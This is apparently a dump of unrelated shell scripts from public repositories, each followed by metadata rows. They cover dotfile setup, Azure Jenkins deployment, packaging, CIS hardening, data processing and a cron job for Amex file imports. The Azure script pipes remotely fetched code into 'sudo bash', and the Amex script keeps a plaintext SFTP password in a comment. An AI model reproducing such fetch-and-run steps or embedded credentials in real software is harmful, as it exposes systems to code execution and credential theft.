echo "dnf found! installing basic software"
sudo dnf install \
ag \
git-extras \
gpick
inkscape \
jq \
luarocks meld \
neovim \
ripgrep \
saidar \
tmux \
tree \
whois \
xclip \
xsel \
zsh \
exit
else
echo -e "\e[34mno apt or dnf found. Aborting...\e[0m"
exit
fi
}
function main() {
clear -x
local options=(
"Install NeoVim plugin manager (vim-plug)"
"Install ZSH plugin manager (OhMyZsh)"
"Install Dotfiles"
"Install basic software"
)
menu() {
echo "What do you want to do?"
for i in ${!options[@]}; do
local label=" $((i + 1))) ${options[i]}"
[ "${choices[i]}" ] && echo -e "\e[46m\e[30m+$label\e[0m" || echo -e " $label"
done
[[ "$msg" ]] && echo "$msg"
:
}
prompt="Check an option (again to uncheck, ENTER when done): "
while menu && read -s -n 1 -rp "$prompt" num && [[ "$num" ]]; do
[[ "$num" != *[![:digit:]]* ]] &&
((num > 0 && num <= ${#options[@]})) ||
{
msg="Invalid option: $num"
clear -x
continue
}
((num--))
msg=""
[[ "${choices[num]}" ]] && choices[num]="" || choices[num]="+"
clear -x
done
echo ""
[ -n "${choices[0]}" ] && installVimplug
[ -n "${choices[1]}" ] && installOhMyZsh
[ -n "${choices[2]}" ] && installDotfiles
[ -n "${choices[3]}" ] && installBasicSoftware
}
main
| true
|
27020342612f6e850ddcd167ebffffcbeee0d385
|
Shell
|
Humm3r/azure-devops-utils
|
/quickstart_template/301-jenkins-k8s-blue-green.sh
|
UTF-8
| 4,893
| 3.953125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
function print_usage() {
cat <<EOF
https://github.com/Azure/azure-quickstart-templates/tree/master/301-jenkins-k8s-blue-green
Command
$0
Arguments
--app_id|-ai [Required] : Service principal app id used to dynamically manage resource in your subscription
--app_key|-ak [Required] : Service principal app key used to dynamically manage resource in your subscription
--subscription_id|-si [Required] : Subscription Id
--tenant_id|-ti [Required] : Tenant Id
--resource_group|-rg [Required] : Resource group containing your Kubernetes cluster
--aks_name|-an [Required] : Name of the Azure Kubernetes Service
--jenkins_fqdn|-jf [Required] : Jenkins FQDN
--artifacts_location|-al : Url used to reference other scripts/artifacts.
--sas_token|-st : A sas token needed if the artifacts location is private.
EOF
}
function throw_if_empty() {
local name="$1"
local value="$2"
if [ -z "$value" ]; then
echo "Parameter '$name' cannot be empty." 1>&2
print_usage
exit -1
fi
}
function run_util_script() {
local script_path="$1"
shift
curl --silent "${artifacts_location}${script_path}${artifacts_location_sas_token}" | sudo bash -s -- "$@"
local return_value=$?
if [ $return_value -ne 0 ]; then
>&2 echo "Failed while executing script '$script_path'."
exit $return_value
fi
}
function install_kubectl() {
if !(command -v kubectl >/dev/null); then
kubectl_file="/usr/local/bin/kubectl"
sudo curl -L -s -o $kubectl_file https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
sudo chmod +x $kubectl_file
fi
}
function install_az() {
if !(command -v az >/dev/null); then
sudo apt-get update && sudo apt-get install -y libssl-dev libffi-dev python-dev
echo "deb [arch=amd64] https://apt-mo.trafficmanager.net/repos/azure-cli/ wheezy main" | sudo tee /etc/apt/sources.list.d/azure-cli.list
sudo apt-key adv --keyserver apt-mo.trafficmanager.net --recv-keys 417A0893
sudo apt-get install -y apt-transport-https
sudo apt-get -y update && sudo apt-get install -y azure-cli
fi
}
artifacts_location="https://raw.githubusercontent.com/Azure/azure-devops-utils/master/"
while [[ $# > 0 ]]
do
key="$1"
shift
case "$key" in
--app_id|-ai)
app_id="$1"
shift
;;
--app_key|-ak)
app_key="$1"
shift
;;
--subscription_id|-si)
subscription_id="$1"
shift
;;
--tenant_id|-ti)
tenant_id="$1"
shift
;;
--resource_group|-rg)
resource_group="$1"
shift
;;
--aks_name|-an)
aks_name="$1"
shift
;;
--jenkins_fqdn|-jf)
jenkins_fqdn="$1"
shift
;;
--artifacts_location|-al)
artifacts_location="$1"
shift
;;
--sas_token|-st)
artifacts_location_sas_token="$1"
shift
;;
--help|-help|-h)
print_usage
exit 13
;;
*)
echo "ERROR: Unknown argument '$key' to script '$0'" 1>&2
exit -1
esac
done
throw_if_empty --app_id "$app_id"
throw_if_empty --app_key "$app_key"
throw_if_empty --subscription_id "$subscription_id"
throw_if_empty --tenant_id "$tenant_id"
throw_if_empty --resource_group "$resource_group"
throw_if_empty --aks_name "$aks_name"
throw_if_empty --jenkins_fqdn "$jenkins_fqdn"
install_kubectl
install_az
sudo apt-get install --yes jq
#install jenkins
#install jenkins
run_util_script "jenkins/install_jenkins.sh" \
--jenkins_release_type verified \
--jenkins_version_location "${artifacts_location}jenkins/blue-green/verified-jenkins-version${artifacts_location_sas_token}" \
--jenkins_fqdn "${jenkins_fqdn}" \
--artifacts_location "${artifacts_location}" \
--sas_token "${artifacts_location_sas_token}"
run_util_script "jenkins/blue-green/bootstrap-k8s-blue-green.sh" \
--resource_group "$resource_group" \
--aks_name "$aks_name" \
--sp_subscription_id "$subscription_id" \
--sp_client_id "$app_id" \
--sp_client_password "$app_key" \
--sp_tenant_id "$tenant_id" \
--artifacts_location "$artifacts_location" \
--sas_token "$artifacts_location_sas_token"
run_util_script "jenkins/blue-green/add-blue-green-job.sh" \
-j "http://localhost:8080/" \
-ju "admin" \
--aks_resource_group "$resource_group" \
--aks_name "$aks_name" \
--sp_subscription_id "$subscription_id" \
--sp_client_id "$app_id" \
--sp_client_password "$app_key" \
--sp_tenant_id "$tenant_id" \
--artifacts_location "$artifacts_location" \
--sas_token "$artifacts_location_sas_token"
rm -f "$temp_key_path"
rm -f "$temp_pub_key"
| true
|
27f83e67580840f9ff8836f1c98f0c9b625092eb
|
Shell
|
petronny/aur3-mirror
|
/xmppjs-hg/PKGBUILD
|
UTF-8
| 841
| 2.53125
| 3
|
[] |
no_license
|
# Packager: Emmanuel Gil Peyrot <linkmauve@linkmauve.fr>
pkgname=xmppjs-hg
pkgver=19
pkgrel=1
pkgdesc='xmpp.js is a server-side XMPP library for Node.js'
arch=('i686' 'x86_64')
provides=('xmppjs')
conflicts=('xmppjs')
url='http://xmppjs.prosody.im/'
license='MIT'
depends=('nodejs' 'node-xml')
makedepends=('mercurial')
_hgroot="http://code.matthewwild.co.uk/"
_hgrepo="xmppjs"
build() {
cd $srcdir/$_hgrepo
sed -i 's,"./node-xml/lib/node-xml","node-xml",; s,"./sha1","sha1",' xmpp.js
mkdir -p $pkgdir/usr/lib/node/
install -Dm0644 *.js $pkgdir/usr/lib/node/
sed -i 's,"../xmpp","xmpp",' examples/*
mkdir -p $pkgdir/usr/share/$_hgrepo/examples/
install -Dm0644 examples/* $pkgdir/usr/share/$_hgrepo/examples/
install -Dm0644 COPYING $pkgdir/usr/share/licenses/$_hgrepo/COPYING
install -Dm0644 README.markdown $pkgdir/usr/share/$_hgrepo/README.markdown
}
| true
|
61eb649a11bdb632b7e9d502b101d8ebc0f404fc
|
Shell
|
threeworld/Security-baseline
|
/Linux/主机安全基线脚本/CIS-LBK/DEBIAN_FAMILY_LBK/functions/recommendations/nix_ensure_source_routed_packets_not_accepted.sh
|
UTF-8
| 5,557
| 3.234375
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#
# CIS-LBK Recommendation Function
# ~/CIS-LBK/functions/recommendations/nix_ensure_source_routed_packets_not_accepted.sh
#
# Name Date Description
# ------------------------------------------------------------------------------------------------
# Eric Pinnell 10/22/20 Recommendation "Ensure source routed packets are not accepted"
# Eric Pinnell 11/12/20 Modified "Updated tests to use sub-functions"
#
ensure_source_routed_packets_not_accepted()
{
echo "- $(date +%d-%b-%Y' '%T) - Starting $RNA" | tee -a "$LOG" 2>> "$ELOG"
test="" test1="" test2="" test3="" test4="" test5="" test6="" test7="" test8=""
src4_chk_fix()
{
# Check IPv4 kernel parameter in running config
t1=""
echo "- $(date +%d-%b-%Y' '%T) - Checking $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
if sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b"; then
t1=passed
else
echo "- $(date +%d-%b-%Y' '%T) - Remediating $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
sysctl -w "$syspar"="$spv"
sysctl -w net.ipv4.route.flush=1
sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b" && t1=remediated
fi
}
src6_chk_fix()
{
# Check IPv6 kernel parameter in running config
t1=""
echo "- $(date +%d-%b-%Y' '%T) - Checking $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
if sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b"; then
t1=passed
else
echo "- $(date +%d-%b-%Y' '%T) - Remediating $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
sysctl -w "$syspar"="$spv"
sysctl -w net.ipv6.route.flush=1
sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b" && t1=remediated
fi
}
spif_chk_fix()
{
# Check kernel parameter in sysctl conf files
t1=""
echo "- $(date +%d-%b-%Y' '%T) - Checking $syspar in sysctl conf files" | tee -a "$LOG" 2>> "$ELOG"
if grep -Elqs "^\s*$regpar\s*=\s*$spv\b" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf && ! grep -Elqs "^\s*$regpar\s*=\s*$nspv" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf; then
t1=passed
else
echo "- $(date +%d-%b-%Y' '%T) - Remediating $syspar in sysctl conf files" | tee -a "$LOG" 2>> "$ELOG"
grep -Els "$regpar\s*=" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf | while read -r filename; do
sed -ri 's/^\s*(#\s*)?('"$regpar"'\s*=\s*)(\S+)(.*)?$/\2'"$spv"'/' "$filename"
done
if ! grep -Elqs "^\s*$regpar\s*=\s*$spv\b" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf; then
echo "$syspar = $spv" >> /etc/sysctl.d/cis_sysctl.conf
fi
grep -Elqs "^\s*$regpar\s*=\s*$spv\b" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf && t1=remediated
fi
}
# Check net.ipv4.conf.all.accept_source_route
# Check net.ipv4.conf.all.accept_source_route in the running config
syspar="net.ipv4.conf.all.accept_source_route"
regpar="net\.ipv4\.conf\.all\.accept_source_route"
spv="0"
src4_chk_fix
test1=$t1
# Check net.ipv4.conf.all.accept_source_route in sysctl conf files
spif_chk_fix
test2=$t1
# Check net.ipv4.conf.default.accept_source_route
# Check net.ipv4.conf.default.accept_source_route in the running config
syspar="net.ipv4.conf.default.accept_source_route"
regpar="net\.ipv4\.conf\.default\.accept_source_route"
spv="0"
src4_chk_fix
test3=$t1
# Check net.ipv4.conf.all.secure_redirects in sysctl conf files
spif_chk_fix
test4=$t1
# Check if IPv6 is enabled on the system
[ -z "$no_ipv6" ] && ipv6_chk
if [ "$no_ipv6" = yes ]; then
echo "- $(date +%d-%b-%Y' '%T) - IPv6 is disabled, skipping IPv6 checks" | tee -a "$LOG" 2>> "$ELOG"
test5=passed test6=passed test7=passed test8=passed
else
# Check net.ipv6.conf.all.accept_source_route
# Check net.ipv6.conf.all.accept_source_route in the running config
syspar="net.ipv6.conf.all.accept_source_route"
regpar="net\.ipv6\.conf\.all\.accept_source_route"
spv="0"
src6_chk_fix
test5=$t1
# Check net.ipv6.conf.all.accept_source_route conf files
spif_chk_fix
test6=$t1
# Check net.ipv6.conf.default.accept_source_route
# Check net.ipv6.conf.default.accept_source_route in the running config
syspar="net.ipv6.conf.default.accept_source_route"
regpar="net\.ipv6\.conf\.default\.accept_source_route"
spv="0"
src6_chk_fix
test7=$t1
# Check net.ipv6.conf.default.accept_source_route
spif_chk_fix
test8=$t1
fi
# Check status of tests
if [ -n "$test1" ] && [ -n "$test2" ] && [ -n "$test3" ] && [ -n "$test4" ] && [ -n "$test5" ] && [ -n "$test6" ] && [ -n "$test7" ] && [ -n "$test8" ]; then
if [ "$test1" = passed ] && [ "$test2" = passed ] && [ "$test3" = passed ] && [ "$test4" = passed ] && [ "$test5" = passed ] && [ "$test6" = passed ] && [ "$test7" = passed ] && [ "$test8" = passed ]; then
test=passed
else
test=remediated
fi
fi
# Set return code and return
case "$test" in
passed)
echo "Recommendation \"$RNA\" No remediation required" | tee -a "$LOG" 2>> "$ELOG"
return "${XCCDF_RESULT_PASS:-101}"
;;
remediated)
echo "Recommendation \"$RNA\" successfully remediated" | tee -a "$LOG" 2>> "$ELOG"
return "${XCCDF_RESULT_PASS:-103}"
;;
manual)
echo "Recommendation \"$RNA\" requires manual remediation" | tee -a "$LOG" 2>> "$ELOG"
return "${XCCDF_RESULT_FAIL:-106}"
;;
*)
echo "Recommendation \"$RNA\" remediation failed" | tee -a "$LOG" 2>> "$ELOG"
return "${XCCDF_RESULT_FAIL:-102}"
;;
esac
}
| true
|
e6a51ac98df72ec2ee2bb9ee463a4b75d1c1fc07
|
Shell
|
cnamejj/cli-tools
|
/check-repo-hash
|
UTF-8
| 263
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
rehash=( $(git ls-remote $(git config --get remote.origin.url) HEAD) )
lohash="$(git rev-parse HEAD)"
[ "${rehash%?HEAD}" = "${lohash}" ] && echo "up to date, both ${rehash%?HEAD}" || echo "version mismatch, local ${lohash} remote ${rehash%?HEAD}"
| true
|
b70acd0af87748e41db7d929e1a4826494723ec5
|
Shell
|
ViralChris/eDNA_metabarcoding
|
/01_scripts/obiannotate_unident.sh
|
UTF-8
| 1,012
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
# For LSU, annotate the '_unidentified.fq' files with sample IDs in the fasta header before concatenating all together
# The output will be $OUTPUT_FOLDER/merged_data_assi.fa
# Global variables
SAMPLE_FOLDER="04_samples"
OUTPUT_FOLDER="04b_annotated_samples"
# issue: if run twice, it will redo on top of the new files because of ambiguity in filename
# HAB-9-18S_S98_L001_R1_assi_diat.fq
# vs
# HAB-9-18S_S98_L001_R1_assi_diat_sannot.fq
# Annotate the merged files with the sample name
ls -1 $SAMPLE_FOLDER/*_unidentified.fq | \
perl -pe 's/\_L001\_R1\_unidentified\.fq//' | \
# Remove the directory part of name
awk -F/ '{ print $2 }' - | \
sort -u | \
while read i
do
echo $i
# Run obiannotate
obiannotate -S sample:"$i" $SAMPLE_FOLDER/$i"_L001_R1_unidentified.fq" > $SAMPLE_FOLDER/$i"_sannot.fq"
done
# Move files to merged folder separately for dino or diat
cat $SAMPLE_FOLDER/*_sannot.fq > $OUTPUT_FOLDER/merged_data_assi.fq
| true
|
6528d0b84a51bb8492e14033dcb43df0247bb983
|
Shell
|
adegomme/quantum-mobile
|
/setup_ansible.sh
|
UTF-8
| 574
| 3.546875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
echo "### Parsing globalconfig.yml"
source other_stuff/yaml_parser.sh
eval $(parse_yaml globalconfig.yml)
# set up ssh config for ansible
vagrant ssh-config > vagrant-ssh
#sed -i"" "s/User vagrant/User ${vm_user}/g" vagrant-ssh
echo "### SSH config written to 'vagrant-ssh'"
echo "### Use e.g.: ssh -F vagrant-ssh default'"
# set up inventory file for ansible
cat > hosts <<EOF
[vms:vars]
ansible_ssh_common_args= -F vagrant-ssh
# modify this line to switch to python2
ansible_python_interpreter=/usr/bin/python3
[vms]
default ansible_user=vagrant
EOF
| true
|
438cd3929b077d89c181a098047c23103cf4833e
|
Shell
|
jpmenil/dotfiles
|
/.zshrc
|
UTF-8
| 183
| 2.765625
| 3
|
[] |
no_license
|
# -*- sh -*-
ZSH=${ZSH:-${ZDOTDIR:-$HOME}/.config/zsh}
() {
for config_file ($ZSH/rc/*.zsh) source $config_file
}
fpath=($ZSH/completions $ZSH/functions $fpath)
_jp_setprompt
| true
|
c3ea0f19ae3601bc40e3bd3aeceb8fbe60f6e719
|
Shell
|
cesar91/envasadoras
|
/shell_scripts/amex_shell.sh
|
WINDOWS-1250
| 1,656
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/sh
#=====SHELL SCRIPT AMEX T&E======*
#==============SFTP==============*
#HOST="fsgateway.aexp.com"
#USER="MASNEGOCIO"
#PASS="msngco123" #autenticacin por medio de SSH KEY RSA
#==============Date==============*
DAY=$(date --date='today' +%Y%m%d)
DATE=$(date --date='today' +%m%d)
#==============Paths=============*
SERVER_PATH="/usr/local/zend/apache2/htdocs/eexpensesv2_bmw"
PHP_PATH="/usr/local/zend/bin/php"
#==============File==============*
EXPR="*"
FILE="BMW_DE_MEXICO_GL1025_"$DAY"_"$EXPR
FILE_LOCAL=$SERVER_PATH"/amex/"$FILE
#FILE_SERVER="outbox/"$FILE
#============Checksum============*
#FILE_SIZE1=$(md5sum $FILE_SERVER | cut -d' ' -f1)
#FILE_SIZE2=$(md5sum $FILE_LOCAL | cut -d' ' -f1)
#=========Conection SFTP=========*
#sftp $USER@$HOST:$FILE_SERVER $SERVER_PATH"/amex"
#$PASS
#get $FILE_SERVER $SERVER_PATH"/amex"
#quit
#=====Clear log each 6 months=====*
if [ $DATE = "0101" ]
then
rm $SERVER_PATH"/shell_scripts/amex.log"
elif [ $DATE = "0701" ]
then
rm $SERVER_PATH"/shell_scripts/amex.log"
fi
#======Check Integrity File=======*
#while [ $FILE_SIZE1 != $FILE_SIZE2 ]
#do
# sleep 1
#done
#======Create log & Run PHP=======*
if [ -f $SERVER_PATH"/shell_scripts/amex.log" ]
then
#echo 1
$PHP_PATH $SERVER_PATH"/interfazAMEX.php">>$SERVER_PATH"/shell_scripts/amex.log"
else
#echo 2
touch $SERVER_PATH"/shell_scripts/amex.log"
chmod 777 $SERVER_PATH"/shell_scripts/amex.log"
$PHP_PATH $SERVER_PATH"/interfazAMEX.php">>$SERVER_PATH"/shell_scripts/amex.log"
fi
#==========End Script============*
exit 0
#=============Cron===============*
#30 23 * * * /usr/local/zend/apache2/htcocs/eexpensesv2/shell_scripts/amex_shell.sh
| true
|
18741bb41408aa3a0aaba9938ecb1dbe8fb9bf70
|
Shell
|
dtbinh/jSAM
|
/anonymyze.sh
|
UTF-8
| 1,384
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
DST="anonymous"
GIT="git@github.com:anonc187/jCoCoA.git"
if [ -e "$DST" ]; then
echo "Target folder $DST already exists"
exit 1;
fi
# Clone git repository
git clone $GIT $DST
git -C $DST config user.name "Anon Y. Mous"
git -C $DST config user.email anon187c@gmail.com
# Remove all content so we also will delete old files
echo "Cleaning up old repository"
rm -rf $DST/*
# Prepare folders
echo "Copying working folder to $DST"
mkdir -p $DST/src/main/java/org/anon/cocoa/
mkdir -p $DST/src/test/java/org/anon/cocoa/
# Copy folders
cp -r src/main/java/nl/coenvl/sam/* $DST/src/main/java/org/anon/cocoa/.
cp -r src/test/java/nl/coenvl/sam/* $DST/src/test/java/org/anon/cocoa/.
# Copy files
FILES=".classpath .project .gitignore build.gradle LICENSE"
for f in $FILES; do
cp $f $DST/.
done
# Copy README
head -n -4 README.md > $DST/README.md
# Anonymize
echo "Anonymizing $DST"
for f in `find $DST -name '*.java'` `find $DST -maxdepth 1 -type f` ; do
sed -i 's/nl.coenvl.sam/org.anon.cocoa/g' $f
sed -i 's/coenvanl@gmail.com/anon187c@gmail.com/g' $f
sed -i 's/c.j.vanleeuwen-2@tudelft.nl/anon187c@gmail.com/g' $f
sed -i 's/Coen van Leeuwen/Anomymous/g' $f
sed -i 's/leeuwencjv/Anomymous/g' $f
sed -i 's/Coen/Anomymous/g' $f
sed -i 's/TNO/Anonymous/g' $f
sed -i 's/SAM/CoCoA/g' $f
done
# Commit and push
echo "Sending commits"
git -C $DST add -A
git -C $DST commit -m `date +%Y-%m-%d`
git -C $DST push origin master
| true
|
0eb2b6ab213598ad17c46cfc5f028458ca598209
|
Shell
|
djbarcelos/script-install-setup
|
/files/Data/custom installation/script_custom.sh
|
UTF-8
| 327
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# --------------- Functions
test () {
for FILE in ../../../files/*; do
echo $FILE;
done
}
save () {
#tail -f /var/log/menssages > out
echo -n "Digitar nome: "
read name
echo $name >> ./out.txt
clear
echo $(cat ./out.txt)
}
# --------------- Main
main () {
clear
echo "custom install"
save
read aa
}
main
| true
|
a495d1da0327f4d0f3576bf475c5dd69e359cd37
|
Shell
|
crdant/bootstrap-for-k8s
|
/bin/setup
|
UTF-8
| 4,688
| 3.53125
| 4
|
[] |
no_license
|
#! /usr/bin/env bash
set -euo pipefail
script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" > /dev/null 2>&1 && pwd)"
project_dir=${script_dir}/..
config_dir=${project_dir}/config
overlay_dir=${project_dir}/overlays
secrets_dir=${project_dir}/secrets
work_dir=${project_dir}/work
product_dir="${work_dir}/tanzu-application-service"
main() {
parse_args $@
create_cluster
prepare_cluster
download_tas
deploy_tas
clean_up
}
parse_args() {
if [ $# -gt 0 ]; then
while [ $# -gt 0 ]; do
case $1 in
--platform | -p)
platform=${2}
shift
;;
--domain | -d)
domain=${2}
shift
;;
--gcp-key-file | -g)
gcp_key_file=${2}
if [ -f ${gcp_key_file}.enc ] ; then
cat ${gcp_key_file}.enc | keybase pgp decrypt > ${gcp_key_file}
decrypted=true
fi
shift
;;
--release | --release-version | -r)
release_version=${2}
shift
;;
*)
echo "Unrecognized option: $1" 1>&2
exit 1
;;
esac
shift
done
fi
set +u
if [ -z "${platform}" ]; then
platform="minikube"
fi
set -u
}
create_cluster() {
if [ -z "${platform}" ]; then
platform="minikube"
fi
eval "create_${platform}_cluster"
}
create_minikube_cluster() {
minikube start --profile tas --kubernetes-version v1.16.8 --container-runtime containerd \
--cpus 6 --memory 10240 --disk-size 30gb
minikube profile tas
}
prepare_cluster() {
local static_ip="$(dig ${domain} +short)"
pd ${project_dir}
(
vendir sync
export YTT_TAS_PREPARE_metallb__pools__default__cidr="${static_ip}/28"
export YTT_TAS_PREPARE_metallb__memberlist__secretkey=$(openssl rand -base64 128)
export YTT_TAS_PREPARE_certmanager__solver__clouddns__keyfile="$(cat ${gcp_key_file})"
# Deploy cluster prepartion
kapp deploy -a prepare -f <( ytt -f ${config_dir} \
--file-mark "_github.com/**/*:type=yaml-plain" \
--file-mark "_github.com/**/*/LICENSE:type=text-plain" \
--data-values-env YTT_TAS_PREPARE ) -y
)
}
download_tas() {
local api_token=$(cat ${secrets_dir}/api-token.enc | keybase pgp decrypt)
pivnet login --api-token ${api_token}
local product_slug='pas-for-kubernetes'
set +u
if [ -z "${release_version}" ]; then
release_version=$(pivnet releases --product-slug ${product_slug} --format json | jq -r '. | sort_by(.software_files_updated_at) | reverse | .[0].version')
fi
set -u
pivnet download-product-files --product-slug='pas-for-kubernetes' \
--release-version="${release_version}" \
--download-dir ${work_dir} \
--glob '*.tar'
rm -rf ${product_dir}/*
tar -C ${product_dir} -xf ${work_dir}/tanzu-application-service.${release_version}-*.tar
rm ${work_dir}/tanzu-application-service.${release_version}-*.tar
mv ${product_dir}/custom-overlays/replace-loadbalancer-with-clusterip.yaml ${product_dir}/config-optional
# cp ${overlay_dir}/* ${product_dir}/custom-overlays
}
deploy_tas() {
local values_dir=${work_dir}/configuration-values
if [ ! -d ${values_dir} ]; then
mkdir ${values_dir}
fi
local values_file="${values_dir}/deployment-values.yml"
local static_ip="$(dig '*.'${domain} +short)"
pd ${product_dir}
(
export YTT_TAS_system_registry__hostname="registry.pivotal.io"
export YTT_TAS_system_registry__username="$(cat ${secrets_dir}/pivnet.json.enc | keybase pgp decrypt | jq -r .username)"
export YTT_TAS_system_registry__password="$(cat ${secrets_dir}/pivnet.json.enc | keybase pgp decrypt | jq -r .password)"
# export YTT_TAS_istio_static_ip=${static_ip}
bin/generate-values.sh -d "${domain}" -g "${gcp_key_file}" > ${values_file}
bin/install-tas.sh ${values_dir}
)
pop
enable_docker
}
clean_up () {
set +u
if [ -n ${decrypted} ] ; then
rm -f ${gcp_key_file}
fi
set -u
}
enable_docker() {
cf_login
cf enable-feature-flag diego_docker
}
cf_login() {
password=$(cat ${work_dir}/deployment-values.yml | yq read - cf_admin_password)
system_domain=$(cat ${work_dir}/deployment-values.yml | yq read - system_domain)
cf login -a https://api.${system_domain} -u admin -p ${password} -o system
}
pause_for() {
message=${1}
time=${2}
i=1
sp="/-\|"
echo -n "Giving ${message} time to complete... "
while [ ${i} -lt ${time} ];
do
printf "\b${sp:i++%${#sp}:1}"
sleep 1
done
echo
}
pd () {
local directory=${1}
pushd ${directory} > /dev/null
}
pop() {
popd > /dev/null
}
main $@
| true
|
9f80a077d33c87e7342f60c1c0c4faf83cda1e81
|
Shell
|
mrworf/lr6-hacks
|
/movefiles.sh
|
UTF-8
| 671
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
SRC=$1
DST=$2
if [[ -z $SRC || -z $DST ]]; then
echo ""
echo "Usage: $0 <output from showfiles.sh> <new dir for extras>"
echo ""
exit 255
fi
if [ ! -d "${DST}" ]; then
mkdir -p "${DST}" || { echo "Cannot create $DST" ; exit 255 ; }
fi
echo "Moving files..."
while IFS="" read -r F || [ -n "$F" ]
do
if [ ! -f "${F}" ]; then
echo "File ${F} does not exist"
else
DIR="$(dirname "$F")"
FILE="$(basename "$F")"
if [ ! -d "${DST}/${DIR}" ]; then
mkdir -p "${DST}/${DIR}" || { echo "Cannot create $DIR in $DST" ; exit 1 ; }
fi
mv "$F" "${DST}/${DIR}" || { echo "Cannot move $F into $DST/$DIR" ; exit 2 ; }
fi
done < "${SRC}"
echo "Done"
| true
|
ef6d32b4fbb4ba1422a72dea44131c59c6a3ec67
|
Shell
|
kooritea/electronic-wechat
|
/scripts/tar-all.sh
|
UTF-8
| 449
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
cd dist
echo 'Start compressing for Mac OS X.'
tar zcf 'mac-osx.tar.gz' 'Electronic WeChat-darwin-x64'
echo 'Compressing for Mac OS X succeed.'
echo 'Start compressing for Linux x64.'
tar zcf 'linux-x64.tar.gz' 'electronic-wechat-linux-x64'
echo 'Compressing for Linux x64 succeed.'
echo 'Start compressing for Linux ia32.'
tar zcf 'linux-ia32.tar.gz' 'electronic-wechat-linux-ia32'
echo 'Compressing for Linux ia32 succeed.'
cd ..
| true
|
ca709ced530d680f85af65d7af7bd89b350afc82
|
Shell
|
Evertcolombia/C_sample_programs_and_Scripts
|
/docker_examples/bin_mount.sh
|
UTF-8
| 496
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
#use the host filesystem and mount it on the container using -v flag with the run command.
sudo docker run -it -v <absolute_path>:<folder_path_or_new_folder_name> <image_name>
# To mount the file system as read-only, use ro flag.
sudo docker run -it -v <aboslute_path>:<folder_path_or_new_folder_name>:ro <image_name>
# Bind mount has some limitations and is dependent on the host’s file system. If a folder is accidentally deleted from the host, Docker can’t do anything.
| true
|
974eb28671c4597358c24906d34c1b8cdcbf2b14
|
Shell
|
stivalaa/EstimNetDirected
|
/src/Random123-1.09/examples/gencl.sh
|
UTF-8
| 1,755
| 3.796875
| 4
|
[] |
permissive
|
#!/bin/sh
# Run the C preprocessor on an OpenCL kernel to generate a C string array
# suitable for clCreateProgramWithSource. This allows us to create
# standalone OpenCL programs that do not depend on paths to the source
# tree (the programs will still run the OpenCL run-time compiler to
# compile the kernel, but the kernel is a string within the program, with
# no external include dependencies)
# Mark Moraes, D. E. Shaw Research
# indenting the cpp output makes errors from the OpenCL runtime compiler
# much more understandable. User can override with whatever they want.
# The classic BSD indent (yes, the one that lived in /usr/ucb/indent once)
# defaults to -br, but recent GNU indent versions do not. Both appear to
# accept -br, fortunately... (BSD indent does not accept -kr or -linux, alas)
PATH=$PATH:/usr/bin
export PATH
if type indent > /dev/null 2>&1; then
: ${GENCL_INDENT="indent -br"}
else
: ${GENCL_INDENT=cat}
fi
# We rely on gsub in awk, which exists in everything except classic
# old V7 awk (Solaris!). If we can find gawk or nawk, we prefer those.
# http://www.shelldorado.com/articles/awkcompat.html
for f in gawk nawk awk; do
if type "$f" > /dev/null 2>&1; then
: ${GENCL_AWK="$f"}
break
fi
done
case "${GENCL_AWK}" in
'') echo "$0: could not find awk!">&2; exit 1;;
esac
usage="Usage: $0 inputoclfilename outputfilename"
case $# in
2) ;;
*) echo "$usage" >&2; exit 1;;
esac
case "$1" in
''|-*) echo "Invalid or empty inputoclfilename: $1
$usage" >&2; exit 1;;
esac
set -e
${CC-cc} -xc -E -P -nostdinc -D__OPENCL_VERSION__=1 $CPPFLAGS "$1" |
${GENCL_INDENT} |
${GENCL_AWK} 'BEGIN {print "static const char *opencl_src = \"\\n\\"}
{gsub("\\", "\\\\", $0); gsub("\"", "\\\"", $0); print $0 "\\n\\"}
END {print "\";"}' > "$2"
| true
|
7416b57351e0758796e2e52364ae593b5a8545e9
|
Shell
|
PowerVS-Actions/powervs-vms-age
|
/age.sh
|
UTF-8
| 4,005
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
: '
Copyright (C) 2021 IBM Corporation
Rafael Sene <rpsene@br.ibm.com> - Initial implementation.
'
# Trap ctrl-c and call ctrl_c()
trap ctrl_c INT
function ctrl_c() {
echo "Bye!"
exit 0
}
function check_dependencies() {
DEPENDENCIES=(ibmcloud curl sh wget jq)
check_connectivity
for i in "${DEPENDENCIES[@]}"
do
if ! command -v "$i" &> /dev/null; then
echo "$i could not be found, exiting!"
exit
fi
done
}
function check_connectivity() {
if ! curl --output /dev/null --silent --head --fail http://cloud.ibm.com; then
echo "ERROR: please, check your internet connection."
exit 1
fi
}
function authenticate() {
local APY_KEY="$1"
